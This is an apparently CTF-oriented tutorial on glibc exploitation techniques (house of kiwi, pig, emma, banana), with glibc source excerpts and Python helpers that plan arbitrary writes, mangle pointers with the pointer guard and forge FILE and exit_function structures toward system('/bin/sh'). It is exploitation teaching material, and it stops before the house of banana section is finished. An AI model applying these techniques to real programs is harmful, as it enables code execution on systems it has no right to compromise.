.text:0000000000050C1B mov rbp, [rdx+78h]
.text:0000000000050C1F mov r12, [rdx+48h]
.text:0000000000050C23 mov r13, [rdx+50h]
.text:0000000000050C27 mov r14, [rdx+58h]
.text:0000000000050C2B mov r15, [rdx+60h]
.text:0000000000050C2F test dword ptr fs:48h, 2
.text:0000000000050C3B jz loc_50CF6
...
.text:0000000000050CF6 loc_50CF6: ; CODE XREF: setcontext+6B↑j
.text:0000000000050CF6 mov rcx, [rdx+0A8h]
.text:0000000000050CFD push rcx
.text:0000000000050CFE mov rsi, [rdx+70h]
.text:0000000000050D02 mov rdi, [rdx+68h]
.text:0000000000050D06 mov rcx, [rdx+98h]
.text:0000000000050D0D mov r8, [rdx+28h]
.text:0000000000050D11 mov r9, [rdx+30h]
.text:0000000000050D15 mov rdx, [rdx+88h]
.text:0000000000050D15 ; } // starts at 50BD0
.text:0000000000050D1C ; __unwind {
.text:0000000000050D1C xor eax, eax
.text:0000000000050D1E retn

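When _IO_new_file_sync is called, rdx points to the _IO_helper_jumps structure, so registers can be loaded by modifying the contents of _IO_helper_jumps.

Taking the ROP approach as an example: rsp must point to the start of a ROP chain laid out in advance, and rip must point to a ret instruction.

Given an arbitrary write: overwrite the _IO_file_sync pointer at _IO_file_jumps + 0x60 with setcontext+61, and set _IO_helper_jumps + 0xA0 and + 0xA8 to the pivot target holding the ROP chain and the address of a ret gadget respectively. This performs a stack pivot.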
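
The three writes can be collected into a plan before being fed to whatever arbitrary-write primitive is available. This is a minimal sketch: the function name and all parameters are hypothetical, and the offsets 0x60, 0xA0 and 0xA8 are the ones stated above.

```python
def plan_kiwi_writes(io_file_jumps, io_helper_jumps, setcontext,
                     rop_chain_addr, ret_gadget):
    """Return {address: value} for the house of kiwi stack pivot."""
    return {
        io_file_jumps + 0x60: setcontext + 61,   # sync slot -> setcontext+61
        io_helper_jumps + 0xA0: rop_chain_addr,  # loaded into rsp by mov rsp, [rdx+0xA0]
        io_helper_jumps + 0xA8: ret_gadget,      # loaded into rcx, pushed, then returned to
    }


# Placeholder addresses; 0x50BD0 matches the setcontext start in the listing above.
writes = plan_kiwi_writes(0x1000, 0x2000, 0x50BD0, 0x3000, 0x4000)
for address, value in sorted(writes.items()):
    print(hex(address), "<-", hex(value))
```

Since the pushed value is a plain ret, execution continues with the first gadget stored at the new rsp.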

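house of pig (arbitrary write still possible)

  • Requires at least a UAF
  1. Use the UAF to leak libc and heap addresses
  2. Use the UAF to modify the fd_nextsize and bk_nextsize fields of a largebin chunk and complete one largebin attack, writing a heap address to __free_hook-0x8. This satisfies the requirement of the later tcache stashing unlink attack that the address stored in the bk field of the target fake chunk be writable
  3. Prepare 5 tcache chunks of the same size, then use the UAF again to modify the fd and bk fields of a smallbin chunk of that size and complete one tcache stashing unlink attack. Because the previous step wrote a writable heap address to __free_hook-0x8, __free_hook-0x10 can be treated as a fake chunk and placed at the head of the tcache list. Since no malloc is available, however, it cannot be allocated directly
  4. Use the UAF once more to modify the fd_nextsize and bk_nextsize fields of a largebin chunk and complete a second largebin attack, writing a heap address to _IO_list_all. When all IO streams are flushed before the program exits, that heap address is treated as a FILE structure, so an arbitrary FILE can be forged there
  5. When forging the FILE at that heap address, the key step is changing its vtable from _IO_file_jumps to _IO_str_jumps, so that the call that would have gone to _IO_file_overflow goes to _IO_str_overflow instead. That function receives the FILE address itself as its argument and calls malloc, memcpy and free in sequence, with the arguments of all three controlled by data in the FILE structure. With suitable FILE contents, the malloc inside _IO_str_overflow returns the fake chunk containing __free_hook that was placed at the head of the tcache list; the memcpy then copies data prepared on the heap into that chunk, giving full control of __free_hook, which can be set to the address of system; finally the free inside _IO_str_overflow triggers __free_hook. If the prepared heap data starts with the string /bin/sh\x00, the result is system("/bin/sh")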
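
Step 5 depends on choosing buffer pointers so that the malloc inside _IO_str_overflow asks for exactly the tcache size holding the fake chunk. The sketch below assumes the relation `new_size = 2 * (_IO_buf_end - _IO_buf_base) + 100` from glibc's strops.c, which is not quoted in these notes and should be checked against the target version; the function name is hypothetical.

```python
def str_overflow_fields(buf_base, request_size):
    """Pick _IO_buf_end so that _IO_str_overflow calls malloc(request_size).

    Assumes new_size = 2 * old_blen + 100, with old_blen = buf_end - buf_base.
    """
    if request_size < 100 or (request_size - 100) % 2 != 0:
        raise ValueError("request size cannot be produced by 2 * old_blen + 100")
    old_blen = (request_size - 100) // 2
    return {
        "_IO_buf_base": buf_base,            # source of the memcpy, later passed to free
        "_IO_buf_end": buf_base + old_blen,  # fixes the malloc size
        "memcpy_len": old_blen,              # bytes copied into the new chunk
    }


fields = str_overflow_fields(0x555555559000, 0xA0)
```

The copy length is tied to the request size, so the data staged at `_IO_buf_base` has to fit within `memcpy_len` bytes.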

house of emma

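Replace the vtable value _IO_file_jumps with _IO_cookie_jumps+offset, chosen so that the slot finally dispatched resolves to _IO_cookie_write.
_IO_cookie_write then calls a function pointer directly, so with the right offsets the control flow can be hijacked.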

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {  
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_cookie_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf),
JUMP_INIT(sync, _IO_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_cookie_read),
JUMP_INIT(write, _IO_cookie_write),
JUMP_INIT(seek, _IO_cookie_seek),
JUMP_INIT(close, _IO_cookie_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue),
};

The table contains _IO_cookie_read, _IO_cookie_write, _IO_cookie_seek and _IO_cookie_close:

static ssize_t  
_IO_cookie_read (FILE *fp, void *buf, ssize_t size) // read
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif

if (read_cb == NULL)
return -1;

return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size) // write
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif

if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}

ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;

return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir) // seek
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif

return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp) // close
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif

if (close_cb == NULL)
return 0;

return close_cb (cfile->__cookie);
}

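Each of these functions calls a function pointer directly. Before the call there is a PTR_DEMANGLE step; debugging shows that it uses the value at fs:[0x30], which can be overwritten with a value we know.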
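
A minimal sketch of the pointer encoding and of the data that follows the FILE in a forged _IO_cookie_file. It assumes the x86-64 scheme (XOR with the guard at fs:[0x30], then rotate left by 0x11) and the layout `__cookie` at 0xE0 followed by the read, write, seek and close callbacks; the function names are hypothetical, and `guard` must be a value the attacker knows or has overwritten.

```python
import struct

MASK64 = (1 << 64) - 1


def rol64(value, bits):
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    value &= MASK64
    return ((value >> bits) | (value << (64 - bits))) & MASK64


def ptr_mangle(pointer, guard):
    """Encode a pointer the way PTR_MANGLE does on x86-64 (assumed scheme)."""
    return rol64(pointer ^ guard, 0x11)


def ptr_demangle(mangled, guard):
    """Inverse of ptr_mangle; this is what _IO_cookie_write applies before the call."""
    return ror64(mangled, 0x11) ^ guard


def cookie_tail(cookie, target, guard):
    """Bytes placed at fp+0xE0: __cookie, then read/write/seek/close callbacks."""
    return struct.pack("<QQQQQ", cookie, 0, ptr_mangle(target, guard), 0, 0)


tail = cookie_tail(cookie=0x555555559100, target=0x7FFFF7E12345,
                   guard=0x1122334455667788)
```

`__cookie` becomes the first argument of the callback, so it is the natural place for a pointer to a command string or a context structure.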

house of banana

exit

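When main() returns, some teardown work still has to be done:

  • User level:
    • flush and release libc's stream buffers (for example flush stdout before exiting), release TLS, ...
  • Kernel level:
    • close the file descriptors opened by the process, free its task structure, ...
    • once all resources have been released, the kernel removes the task from the scheduling queue
    • it then sends a signal to the parent process to report that a child has terminated
    • only then has the process really ended

So we can say:

  • process termination => release the resources it holds + stop giving it CPU time

Kernel-level termination goes through the exit system call, which is a plain syscall; libc declares it as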

#include <unistd.h> 
void _exit(int status);

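Calling _exit() directly causes problems, though: data still sitting in stdout's buffer is discarded by the kernel without being flushed, so output is lost. Some user-level teardown is therefore needed before calling _exit().

libc defines the function responsible for this work as exit(), declared as follows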

#include <stdlib.h> 
extern void exit (int __status);

void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}

void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

__libc_lock_lock (__exit_funcs_lock);

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);
void *arg;

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
arg = f->func.on.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
onfct (status, arg);
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
atfct ();
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
arg = f->func.cxa.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
cxafct (arg, status);
__libc_lock_lock (__exit_funcs_lock);
break;
}

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
continue;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);
}

__libc_lock_unlock (__exit_funcs_lock);

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};
extern struct exit_function_list *__exit_funcs attribute_hidden;

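In summary:

  • exit(status)
    • __run_exit_handlers(status)
      • __call_tls_dtors
      • walk exit_function_list
        • ef_cxa: call functions registered with __cxa_atexit
        • ef_at: call functions registered with atexit
        • ef_on: call functions registered with on_exit
        • ...
      • if a new callback is registered during execution, restart from the head of the list
      • free dynamically allocated callback nodes
      • if run_list_atexit == true, run __libc_atexit
      • finally call _exit(status)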

__exit_funcs

Function pointers stored here must be demangled with the value at fs:0x30 (pointer_guard in the structure below).

typedef struct  
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard;
unsigned long int unused_vgetcpu_cache[2];
/* Bit 0: X86_FEATURE_1_IBT.
Bit 1: X86_FEATURE_1_SHSTK.
*/
unsigned int feature_1;
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
/* The lowest address of shadow stack, */
unsigned long long int ssp_base;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

void *__padding[8];
} tcbhead_t;
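
The 0x30 offset can be checked from the field sizes of tcbhead_t, and the same guard is what a forged exit_function entry has to be mangled with. A minimal sketch, assuming x86-64 field sizes, the enum order ef_free, ef_us, ef_on, ef_at, ef_cxa (so ef_cxa is 4), and mangling by XOR then rotate-left by 0x11; `forge_exit_function_list` is a hypothetical helper and `guard` must be known or overwritten beforehand.

```python
import struct

MASK64 = (1 << 64) - 1
EF_CXA = 4  # assumed enum order: ef_free, ef_us, ef_on, ef_at, ef_cxa

# tcb, dtv, self (pointers), multiple_threads, gscope_flag (ints),
# sysinfo, stack_guard (uintptr_t) come before pointer_guard.
POINTER_GUARD_OFFSET = struct.calcsize("<QQQiiQQ")


def rol64(value, bits):
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ptr_mangle(pointer, guard):
    return rol64(pointer ^ guard, 0x11)


def forge_exit_function_list(func, arg, guard):
    """One-entry exit_function_list whose ef_cxa handler calls func(arg, status)."""
    header = struct.pack("<QQ", 0, 1)  # next = NULL, idx = 1
    entry = struct.pack("<qQQQ", EF_CXA, ptr_mangle(func, guard), arg, 0)
    return header + entry


print(hex(POINTER_GUARD_OFFSET))
node = forge_exit_function_list(0x7FFFF7C50D70, 0x7FFFF7DD8678, guard=0)
```

With `guard=0` the stored value is just the rotated pointer, which is the situation after the guard has been overwritten with zero.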
exit_function registration

The list walk runs functions registered through atexit and similar calls, so start with atexit

/* Register FUNC to be executed by `exit'.  */
int
#ifndef atexit
attribute_hidden
#endif
atexit (void (*func) (void))
{
return __cxa_atexit ((void (*) (void *)) func, NULL, __dso_handle);
}
__cxa_atexit
/* Register a function to be called by exit or when a shared library
is unloaded. This function is only called from code generated by
the C++ compiler. */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)
__internal_atexit
int
attribute_hidden
__internal_atexit (void (*func) (void *), void *arg, void *d,
struct exit_function_list **listp)
{
struct exit_function *new;

/* As a QoI issue we detect NULL early with an assertion instead
of a SIGSEGV at program exit when the handler is run (bug 20544). */
assert (func != NULL);

__libc_lock_lock (__exit_funcs_lock);
new = __new_exitfn (listp);

if (new == NULL)
{
__libc_lock_unlock (__exit_funcs_lock);
return -1;
}

#ifdef PTR_MANGLE
PTR_MANGLE (func);
#endif
new->func.cxa.fn = (void (*) (void *, int)) func;
new->func.cxa.arg = arg;
new->func.cxa.dso_handle = d;
new->flavor = ef_cxa;
__libc_lock_unlock (__exit_funcs_lock);
return 0;
}
__new_exitfn
/* Must be called with __exit_funcs_lock held.  */
struct exit_function *
__new_exitfn (struct exit_function_list **listp)
{
struct exit_function_list *p = NULL;
struct exit_function_list *l;
struct exit_function *r = NULL;
size_t i = 0;

if (__exit_funcs_done)
/* Exit code is finished processing all registered exit functions,
therefore we fail this registration. */
return NULL;

for (l = *listp; l != NULL; p = l, l = l->next)
{
for (i = l->idx; i > 0; --i)
if (l->fns[i - 1].flavor != ef_free)
break;

if (i > 0)
break;

/* This block is completely unused. */
l->idx = 0;
}

if (l == NULL || i == sizeof (l->fns) / sizeof (l->fns[0]))
{
/* The last entry in a block is used. Use the first entry in
the previous block if it exists. Otherwise create a new one. */
if (p == NULL)
{
assert (l != NULL);
p = (struct exit_function_list *)
calloc (1, sizeof (struct exit_function_list));
if (p != NULL)
{
p->next = *listp;
*listp = p;
}
}

if (p != NULL)
{
r = &p->fns[0];
p->idx = 1;
}
}
else
{
/* There is more room in the block. */
r = &l->fns[i];
l->idx = i + 1;
}

/* Mark entry as used, but we don't know the flavor now. */
if (r != NULL)
{
r->flavor = ef_us;
++__new_exitfn_called;
}

return r;
}

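It first looks in __exit_funcs for an exit_function slot whose flavor is ef_free, which marks the slot as unused.

If none is found, it allocates a new exit_function_list node, inserts it at the head of the __exit_funcs list, and uses the first slot of the new node as the allocated exit_function. The chosen exit_function is then marked ef_us (in use) and returned.

This only finds a slot, so which functions actually get registered? They are registered before main runs, so look at the program entry point _start.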

_start

ENTRY (_start)
/* Clearing frame pointer is insufficient, use CFI. */
cfi_undefined (rip)
/* Clear the frame pointer. The ABI suggests this be done, to mark
the outermost frame obviously. */
xorl %ebp, %ebp

/* Extract the arguments as encoded on the stack and set up
the arguments for __libc_start_main (int (*main) (int, char **, char **),
int argc, char *argv,
void (*init) (void), void (*fini) (void),
void (*rtld_fini) (void), void *stack_end).
The arguments are passed via registers and on the stack:
main: %rdi
argc: %rsi
argv: %rdx
init: %rcx
fini: %r8
rtld_fini: %r9
stack_end: stack. */

mov %RDX_LP, %R9_LP /* Address of the shared library termination
function. */
#ifdef __ILP32__
mov (%rsp), %esi /* Simulate popping 4-byte argument count. */
add $4, %esp
#else
popq %rsi /* Pop the argument count. */
#endif
/* argv starts just at the current stack top. */
mov %RSP_LP, %RDX_LP
/* Align the stack to a 16 byte boundary to follow the ABI. */
and $~15, %RSP_LP

/* Push garbage because we push 8 more bytes. */
pushq %rax

/* Provide the highest stack address to the user code (for stacks
which grow downwards). */
pushq %rsp

/* These used to be the addresses of .fini and .init. */
xorl %r8d, %r8d
xorl %ecx, %ecx

#ifdef PIC
mov main@GOTPCREL(%rip), %RDI_LP
#else
mov $main, %RDI_LP
#endif

/* Call the user's main function, and exit with its value.
But let the libc call main. Since __libc_start_main in
libc.so is called very early, lazy binding isn't relevant
here. Use indirect branch via GOT to avoid extra branch
to PLT slot. In case of static executable, ld in binutils
2.26 or above can convert indirect branch into direct
branch. */
call *__libc_start_main@GOTPCREL(%rip)

hlt /* Crash if somehow `exit' does return. */
END (_start)

/* Define a symbol for the first piece of initialized data. */
.data
.globl __data_start
__data_start:
.long 0
.weak data_start
data_start = __data_start

What matters here are the arguments passed to __libc_start_main: main, argc, argv, init, fini, rtld_fini and stack_end. The first three need no explanation; for init, fini and rtld_fini:

/* Note: The init and fini parameters are no longer used.  fini is
completely unused, init is still called if not NULL, but the
current startup code always passes NULL. (In the future, it would
be possible to use fini to pass a version code if init is NULL, to
indicate the link-time glibc without introducing a hard
incompatibility for new programs with older glibc versions.)

For dynamically linked executables, the dynamic segment is used to
locate constructors and destructors. For statically linked
executables, the relevant symbols are access directly. */
STATIC int
LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)
{
#ifndef SHARED
char **ev = &argv[argc + 1];

__environ = ev;

/* Store the lowest stack address. This is done in ld.so if this is
the code for the DSO. */
__libc_stack_end = stack_end;

# ifdef HAVE_AUX_VECTOR
/* First process the auxiliary vector since we need to find the
program header to locate an eventually present PT_TLS entry. */
# ifndef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec;
{
char **evp = ev;
while (*evp++ != NULL)
;
auxvec = (ElfW(auxv_t) *) evp;
}
# endif
_dl_aux_init (auxvec);
if (GL(dl_phdr) == NULL)
# endif
{
/* Starting from binutils-2.23, the linker will define the
magic symbol __ehdr_start to point to our own ELF header
if it is visible in a segment that also includes the phdrs.
So we can set up _dl_phdr and _dl_phnum even without any
information from auxv. */

extern const ElfW(Ehdr) __ehdr_start
# if BUILD_PIE_DEFAULT
__attribute__ ((visibility ("hidden")));
# else
__attribute__ ((weak, visibility ("hidden")));
if (&__ehdr_start != NULL)
# endif
{
assert (__ehdr_start.e_phentsize == sizeof *GL(dl_phdr));
GL(dl_phdr) = (const void *) &__ehdr_start + __ehdr_start.e_phoff;
GL(dl_phnum) = __ehdr_start.e_phnum;
}
}

/* Initialize very early so that tunables can use it. */
__libc_init_secure ();

__tunables_init (__environ);

ARCH_INIT_CPU_FEATURES ();

/* Do static pie self relocation after tunables and cpu features
are setup for ifunc resolvers. Before this point relocations
must be avoided. */
_dl_relocate_static_pie ();

/* Perform IREL{,A} relocations. */
ARCH_SETUP_IREL ();

/* The stack guard goes into the TCB, so initialize it early. */
ARCH_SETUP_TLS ();

/* In some architectures, IREL{,A} relocations happen after TLS setup in
order to let IFUNC resolvers benefit from TCB information, e.g. powerpc's
hwcap and platform fields available in the TCB. */
ARCH_APPLY_IREL ();

/* Set up the stack checker's canary. */
uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
__stack_chk_guard = stack_chk_guard;
# endif

# ifdef DL_SYSDEP_OSCHECK
{
/* This needs to run to initiliaze _dl_osversion before TLS
setup might check it. */
DL_SYSDEP_OSCHECK (__libc_fatal);
}
# endif

/* Initialize libpthread if linked in. */
if (__pthread_initialize_minimal != NULL)
__pthread_initialize_minimal ();

/* Set up the pointer guard value. */
uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
__pointer_chk_guard_local = pointer_chk_guard;
# endif

#endif /* !SHARED */

/* Register the destructor of the dynamic linker if there is any. */
if (__glibc_likely (rtld_fini != NULL))
__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);

#ifndef SHARED
/* Perform early initialization. In the shared case, this function
is called from the dynamic loader as early as possible. */
__libc_early_init (true);

/* Call the initializer of the libc. This is only needed here if we
are compiling for the static library in which case we haven't
run the constructors in `_dl_start_user'. */
__libc_init_first (argc, argv, __environ);

/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

/* Some security at this point. Prevent starting a SUID binary where
the standard file descriptors are not opened. We have to do this
only for statically linked applications since otherwise the dynamic
loader did the work already. */
if (__builtin_expect (__libc_enable_secure, 0))
__libc_check_standard_fds ();
#endif /* !SHARED */

/* Call the initializer of the program, if any. */
#ifdef SHARED
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
GLRO(dl_debug_printf) ("\ninitialize program: %s\n\n", argv[0]);

if (init != NULL)
/* This is a legacy program which supplied its own init
routine. */
(*init) (argc, argv, __environ MAIN_AUXVEC_PARAM);
else
/* This is a current program. Use the dynamic segment to find
constructors. */
call_init (argc, argv, __environ);

/* Auditing checkpoint: we have a new object. */
_dl_audit_preinit (GL(dl_ns)[LM_ID_BASE]._ns_loaded);

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
GLRO(dl_debug_printf) ("\ntransferring control: %s\n\n", argv[0]);
#else /* !SHARED */
call_init (argc, argv, __environ);

_dl_debug_initialize (0, LM_ID_BASE);
#endif

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);
}

/* Starting with glibc 2.34, the init parameter is always NULL. Older
libcs are not prepared to handle that. The macro
DEFINE_LIBC_START_MAIN_VERSION creates GLIBC_2.34 alias, so that
newly linked binaries reflect that dependency. The macros below
expect that the exported function is called
__libc_start_main_impl. */

From glibc 2.34 on, the init and fini parameters are deprecated; as shown above, __libc_start_main calls call_init itself

/* Initialization for dynamic executables.  Find the main executable
link map and run its init functions. */
static void
call_init (int argc, char **argv, char **env)
{
/* Obtain the main map of the executable. */
struct link_map *l = GL(dl_ns)[LM_ID_BASE]._ns_loaded;

/* DT_PREINIT_ARRAY is not processed here. It is already handled in
_dl_init in elf/dl-init.c. Also see the call_init function in
the same file. */

if (ELF_INITFINI && l->l_info[DT_INIT] != NULL)
DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr,
argc, argv, env);

ElfW(Dyn) *init_array = l->l_info[DT_INIT_ARRAY];
if (init_array != NULL)
{
unsigned int jm
= l->l_info[DT_INIT_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr));
ElfW(Addr) *addrs = (void *) (init_array->d_un.d_ptr + l->l_addr);
for (unsigned int j = 0; j < jm; ++j)
((dl_init_t) addrs[j]) (argc, argv, env);
}
}

/* Initialization for static executables. There is no dynamic
segment, so we access the symbols directly. */
static void
call_init (int argc, char **argv, char **envp)
{
/* For static executables, preinit happens right before init. */
{
const size_t size = __preinit_array_end - __preinit_array_start;
size_t i;
for (i = 0; i < size; i++)
(*__preinit_array_start [i]) (argc, argv, envp);
}

# if ELF_INITFINI
_init ();
# endif

const size_t size = __init_array_end - __init_array_start;
for (size_t i = 0; i < size; i++)
(*__init_array_start [i]) (argc, argv, envp);
}

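For a dynamically linked program, call_init first obtains the link_map of the main executable, runs .init, and then walks the .init_array function array to run the executable's constructors. Constructors of the loaded shared objects are run by a different function, _dl_init in the dynamic linker, which calls its own call_init for each object: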

void
_dl_init (struct link_map *main_map, int argc, char **argv, char **env)
{
ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY];
ElfW(Dyn) *preinit_array_size = main_map->l_info[DT_PREINIT_ARRAYSZ];
unsigned int i;

if (__glibc_unlikely (GL(dl_initfirst) != NULL))
{
call_init (GL(dl_initfirst), argc, argv, env);
GL(dl_initfirst) = NULL;
}

/* Don't do anything if there is no preinit array. */
if (__builtin_expect (preinit_array != NULL, 0)
&& preinit_array_size != NULL
&& (i = preinit_array_size->d_un.d_val / sizeof (ElfW(Addr))) > 0)
{
ElfW(Addr) *addrs;
unsigned int cnt;

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
_dl_debug_printf ("\ncalling preinit: %s\n\n",
DSO_FILENAME (main_map->l_name));

addrs = (ElfW(Addr) *) (preinit_array->d_un.d_ptr + main_map->l_addr);
for (cnt = 0; cnt < i; ++cnt)
((dl_init_t) addrs[cnt]) (argc, argv, env);
}

/* Stupid users forced the ELF specification to be changed. It now
says that the dynamic loader is responsible for determining the
order in which the constructors have to run. The constructors
for all dependencies of an object must run before the constructor
for the object itself. Circular dependencies are left unspecified.

This is highly questionable since it puts the burden on the dynamic
loader which has to find the dependencies at runtime instead of
letting the user do it right. Stupidity rules! */

i = main_map->l_searchlist.r_nlist;
while (i-- > 0)
call_init (main_map->l_initfini[i], argc, argv, env);

#ifndef HAVE_INLINED_SYSCALLS
/* Finished starting up. */
_dl_starting_up = 0;
#endif
}
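Who calls _dl_init? There is another _start, located in dl-start.S (the entry point of the dynamic linker); the _start shown earlier lives in start.S (the entry point of the program). The listing below is the OpenRISC variant of dl-start.S.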

/* Initial entry point code for the dynamic linker.
The function _dl_start is the real entry point;
it's return value is the user program's entry point. */
ENTRY (_start)
/* Count arguments in r11 */
l.ori r3, r1, 0
l.movhi r11, 0
1:
l.addi r3, r3, 4
l.lwz r12, 0(r3)
l.sfnei r12, 0
l.addi r11, r11, 1
l.bf 1b
l.nop
l.addi r11, r11, -1
/* store argument counter to stack. */
l.sw 0(r1), r11

/* Load the PIC register. */
l.jal 0x8
l.movhi r16, gotpchi(_GLOBAL_OFFSET_TABLE_-4)
l.ori r16, r16, gotpclo(_GLOBAL_OFFSET_TABLE_+0)
l.add r16, r16, r9

l.ori r3, r1, 0

l.jal _dl_start
l.nop
/* Save user entry in a call saved reg. */
l.ori r22, r11, 0
/* Fall through to _dl_start_user. */

_dl_start_user:
/* Set up for _dl_init. */

/* Load _rtld_local (a.k.a _dl_loaded). */
l.lwz r12, got(_rtld_local)(r16)
l.lwz r3, 0(r12)

/* Load argc */
l.lwz r18, got(_dl_argc)(r16)
l.lwz r4, 0(r18)

/* Load argv */
l.lwz r20, got(_dl_argv)(r16)
l.lwz r5, 0(r20)

/* Load envp = &argv[argc + 1]. */
l.slli r6, r4, 2
l.addi r6, r6, 4
l.add r6, r6, r5

l.jal plt(_dl_init)
l.nop

/* Now set up for user entry.
The already defined ABI loads argc and argv from the stack.

argc = 0(r1)
argv = r1 + 4
*/

/* Load SP as argv - 4. */
l.lwz r3, 0(r20)
l.addi r1, r3, -4

/* Save argc. */
l.lwz r3, 0(r18)
l.sw 0(r1), r3

/* Pass _dl_fini function address to _start.
Next start.S will then pass this as rtld_fini to __libc_start_main. */
